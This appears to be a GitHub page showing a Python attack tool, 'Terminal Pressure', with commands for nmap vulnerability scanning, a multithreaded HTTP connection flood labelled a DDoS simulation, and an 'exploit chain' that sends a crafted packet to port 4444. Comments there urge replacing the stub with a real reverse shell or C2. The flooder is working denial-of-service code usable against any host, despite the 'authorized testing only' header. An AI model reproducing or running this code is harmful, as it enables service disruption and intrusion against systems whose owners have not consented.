forked from Terminal-Pressure/TerminalPressure
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathterminal_pressure.py
More file actions
105 lines (91 loc) · 4.5 KB
/
terminal_pressure.py
File metadata and controls
105 lines (91 loc) · 4.5 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/env python3
# Copyright (c) 2025 CyberViser. All Rights Reserved.
# Licensed under the CyberViser Proprietary License — see LICENSE for details.
# FOR AUTHORIZED SECURITY TESTING ONLY. Unauthorized use is illegal and prohibited.
import argparse
import concurrent.futures
import importlib
import logging
import socket
import time
def _load_optional_dependency(module_name, package_name):
"""Import command-specific dependencies only when the command is used."""
try:
return importlib.import_module(module_name)
except ImportError as exc:
raise SystemExit(
f"Missing optional dependency '{package_name}'. "
f"Install it with `pip install {package_name}`."
) from exc
def positive_int(value):
value = int(value)
if value <= 0:
raise argparse.ArgumentTypeError("must be a positive integer")
return value
def scan_vulns(target):
nmap = _load_optional_dependency("nmap", "python-nmap")
scanner = nmap.PortScanner()
print(f"[+] Pressuring target: {target}")
scanner.scan(target, '1-1024', '-sV --script vuln')
for host in scanner.all_hosts():
print(f"Host: {host}")
for proto in scanner[host].all_protocols():
ports = scanner[host][proto].keys()
for port in ports:
state = scanner[host][proto][port]['state']
service = scanner[host][proto][port]['name']
print(f"Port {port}/{proto}: {state} ({service})")
if 'script' in scanner[host][proto][port]:
for script in scanner[host][proto][port]['script']:
print(f"Vuln Script: {script} - {scanner[host][proto][port]['script'][script]}")
def stress_test(target, port=80, threads=50, duration=60):
def flood():
end_time = time.time() + duration
while time.time() < end_time:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, port))
s.send(b"GET / HTTP/1.1\r\nHost: " + target.encode() + b"\r\n\r\n")
except (socket.error, OSError) as e:
logging.debug("Connection error: %s", e)
print(f"[+] Applying pressure to {target}:{port} with {threads} threads for {duration}s")
max_workers = min(threads, 100)
with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = [executor.submit(flood) for _ in range(threads)]
concurrent.futures.wait(futures)
def exploit_chain(target, payload="default_backdoor"):
# Shadow module: Simulate exploit (real: inject shellcode)
if payload == "default_backdoor":
print(f"[+] Injecting backdoor sim on {target} - Codex tip: Replace with real rev-shell")
# Placeholder: In prod, use metasploit embeds or custom C2
scapy = _load_optional_dependency("scapy.all", "scapy")
pkt = scapy.IP(dst=target) / scapy.TCP(dport=4444, flags="S") / scapy.Raw(load=b"CHAOS_AWAKEN")
scapy.send(pkt, verbose=0)
else:
print(f"[+] Custom exploit chain: {payload}")
def build_parser():
parser = argparse.ArgumentParser(description="Terminal Pressure: Cyber Tool for Pressure Testing")
subparsers = parser.add_subparsers(dest='command', required=True)
scan_parser = subparsers.add_parser('scan', help='Scan for vulnerabilities')
scan_parser.add_argument('target', type=str, help='Target IP/hostname')
stress_parser = subparsers.add_parser('stress', help='Stress test (DDoS sim)')
stress_parser.add_argument('target', type=str, help='Target IP/hostname')
stress_parser.add_argument('--port', type=positive_int, default=80, help='Port')
stress_parser.add_argument('--threads', type=positive_int, default=50, help='Threads')
stress_parser.add_argument('--duration', type=positive_int, default=60, help='Duration in seconds')
exploit_parser = subparsers.add_parser('exploit', help='Exploit chain (advanced)')
exploit_parser.add_argument('target', type=str, help='Target IP/hostname')
exploit_parser.add_argument('--payload', type=str, default='default_backdoor', help='Payload type')
return parser
def main(argv=None):
parser = build_parser()
args = parser.parse_args(argv)
if args.command == 'scan':
scan_vulns(args.target)
elif args.command == 'stress':
stress_test(args.target, args.port, args.threads, args.duration)
else:
exploit_chain(args.target, args.payload)
return 0
if __name__ == "__main__":
raise SystemExit(main())